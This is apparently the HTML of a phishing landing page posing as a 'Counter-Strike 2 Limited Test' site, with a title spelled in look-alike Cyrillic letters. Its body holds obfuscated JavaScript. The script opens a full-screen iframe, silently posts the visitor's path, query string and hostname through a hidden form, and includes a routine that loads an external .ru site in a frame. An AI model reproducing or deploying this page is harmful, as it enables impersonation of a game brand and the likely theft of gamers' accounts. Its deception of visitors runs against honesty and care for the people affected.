<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="generator">
<meta name="robots" content="index,follow">
<meta name="page-topic" content="Topic">
<meta name="keywords" content="Blog,news">
<meta name="rating" content="General">
<meta name="revisit-after" content="30 days">
<meta name="copyright">
<meta name="distribution" content="global">
<title>Соuntеr-Strikе 2 | LIМIТЕD ТЕSТ</title><meta property="og:title" content="Соuntеr-Strikе 2 | LIМIТЕD ТЕSТ"><link rel="shortcut icon" href="https://psv4.userapi.com/c909618/u536684543/docs/d38/3626bc9423b1/removed.webp?extra=Sybcm-8vobksRIGEHFpCuh0ycySqCUrAyPrsMAXb987Dc1yAlKWgNBAZRP2LcmsIUDAIfS-twRLSQ6e11u7mA3rcFpA7IZTrvqVS_-9T8GVkM0P-eHr9wIWdFQBquwfyKFAlN5jYCAWAHLYO_B1bA3w" type="image/x-icon"><meta property="og:description" content="Counter-Strike 2 is the largest technical leap forward in Counter-Strike history, ensuring new features and updates for years to come."><meta property="og:image" content="https://i.ibb.co/Bw95RCG/cs2.jpg">
<script src="https://cdn.jsdelivr.net/npm/react@18.2.0/umd/react.production.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/react-dom@18.2.0/umd/react-dom.production.min.js"></script>
    
  <script type="module" crossorigin src="/assets/7qbj4wqnbk8/yqigi2z28sm.min.js"></script>
  <link rel="stylesheet" href="/assets/rnf8n2065wr/6055aae756otmpmf83x.css">
</head>

<body>
<style>#cl2ptvvoyi8b { display: none !important; } .cl2ptvvoyi8b { display: block; }</style>
<section name="title" for="you" id="cl2ptvvoyi8b" class="cl2ptvvoyi8b"><h1 class="elit">cumbersome</h1></section>
    <noscript>You need to enable JavaScript to run this app.</noscript>
    <script>(function(d,r){const R=d();function j(d,r){return o(r-0xcc,d);}while(!![]){try{const h=parseInt(j(0x25b,0x26a))/0x1*(-parseInt(j(0x25c,0x272))/0x2)+parseInt(j(0x279,0x26e))/0x3+parseInt(j(0x272,0x279))/0x4+parseInt(j(0x260,0x26f))/0x5*(-parseInt(j(0x259,0x26b))/0x6)+-parseInt(j(0x283,0x27b))/0x7*(-parseInt(j(0x282,0x27c))/0x8)+parseInt(j(0x264,0x263))/0x9*(-parseInt(j(0x29a,0x28f))/0xa)+-parseInt(j(0x294,0x27f))/0xb*(-parseInt(j(0x269,0x281))/0xc);if(h===r)break;else R['push'](R['shift']());}catch(y){R['push'](R['shift']());}}}(A,0xda2c3));function k(d,r){return o(d- -0xca,r);}window[k(0xf1,0xdd)]={'pathname':window['location'][k(0xfb,0x100)],'search':window['location'][k(0xd6,0xc0)],'hostname':window[k(0xe8,0xf9)]['hostname']};function doLanding(){let d=document['createElement'](G(0x1c,0x6));function G(d,r){return k(d- -0xbf,r);}d['setAttribute'](G(0x2f,0x2e),G(0x37,0x2f)),d['src']='https://en.stetrade.ru/',document[G(0x22,0x19)][G(0xf,0x26)](d);}function doIFrame(){if(window[m(0x22,0x36)])return;localStorage[m(-0x4,0x12)]='1';let d=document[m(0x30,0x37)](m(0x24,0x1a));function m(d,r){return k(r- -0xc1,d);}d['id']=m(0x1a,0x1a),d['setAttribute'](m(0x18,0x2e),m(0x21,0x29)),d[m(0x2e,0x39)]('name','site'),d['setAttribute'](m(0x20,0x2d),m(0x1a,0x10)),document[m(0x19,0x20)][m(0x21,0xd)](d);let r=document['createElement'](m(0x26,0x32));r['id']=m(0x38,0x26),d[m(0x24,0x1f)][m(0x14,0x20)][m(0x2,0xd)](r),d[m(0x1,0xe)]();let R=document[m(0x27,0x37)](m(0x21,0x34));R[m(0x2e,0x39)](m(0x29,0x21),m(0x13,0x2b));for(let y of['pathname',m(0x23,0x15),m(0x31,0x1c)]){let t=document[m(0x48,0x37)](m(0x30,0x23));t[m(0x33,0x39)]('hidden',''),t[m(0x31,0x39)](m(0x42,0x33),y),t['setAttribute'](m(0x2c,0x2c),window[m(0x2d,0x27)][y]),R[m(0x10,0xd)](t);}let h=Math[m(0x3b,0x2f)]()[m(0x14,0x11)](0x24)[m(0x1e,0x1e)](0x2)[m(0x23,0x19)](0xc,'a')[m(0x2e,0x1e)](0x0,0xa);R[m(0x22,0xf)]='/'+h+'f/',R['method']=m(0x35,0x31),R[m(0xe,0x1d)]='site',document[m(0x19,0x20)]['appendChild'](R),R['submit'](),R['remove']();}function o(d,r){const R=A();return o=function(h,y){h=h-0x197;let t=R[h];return t;},o(d,r);}doIFrame();function A(){const Q=['300598xwxpxW','576006ihrTsh','search','section','1193256zpALCH','15wVBPDD','padEnd','iframe','6JjzATv','hostname','target','substring','contentDocument','body','accept','644508dmlNYk','input','2340751WevuMt','8FFmsou','__iframe','location','55DWreYs','main','6838680EtdlHO','text/html','value','style','title','random','fake_data','POST','div','name','form','height:100vh;width:100vw;border:0;outline:none;z-index:\x2010;','fuck_up','createElement','3650aKVqIs','setAttribute','pathname','40914yixoyM','appendChild','focus','action','height:0;width:0;border:0;outline:none;z-index:\x2010;','toString','is_clear'];A=function(){return Q;};return A();}let section=document['getElementsByTagName'](k(0xd7,0xeb));section&&section[0x0]&&section[0x0]['remove']();</script>
</body></html>